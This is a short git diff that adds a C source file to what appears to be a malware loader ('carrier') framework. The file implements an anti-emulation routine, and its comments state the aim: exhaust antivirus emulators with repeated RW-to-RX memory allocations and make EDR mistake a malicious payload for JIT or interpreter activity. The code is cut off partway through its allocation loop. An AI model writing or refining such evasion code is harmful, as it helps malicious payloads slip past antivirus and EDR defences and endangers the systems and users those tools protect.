diff --git a/data/source/carrier/antiemulation/sirallocalot.c b/data/source/carrier/antiemulation/sirallocalot.c new file mode 100644 index 0000000..766bcee --- /dev/null +++ b/data/source/carrier/antiemulation/sirallocalot.c @@ -0,0 +1,47 @@ + +#define ALLOC_NUM 256 + + +/* This will allocate ALLOC_NUM RW memory regions, + set them to RX, and free them + + The idea is that the AV emulator will probably give up, either because + of used memory is above maximum, or amount of instructions, or + number of API calls, or time. + + It hopefully also makes the EDR think this program is doing some + kind of interpreter or JIT compilation, and not a malicious payload. +*/ + +void antiemulation() { + void* allocs[ALLOC_NUM]; + DWORD result; + + for(int n=0; n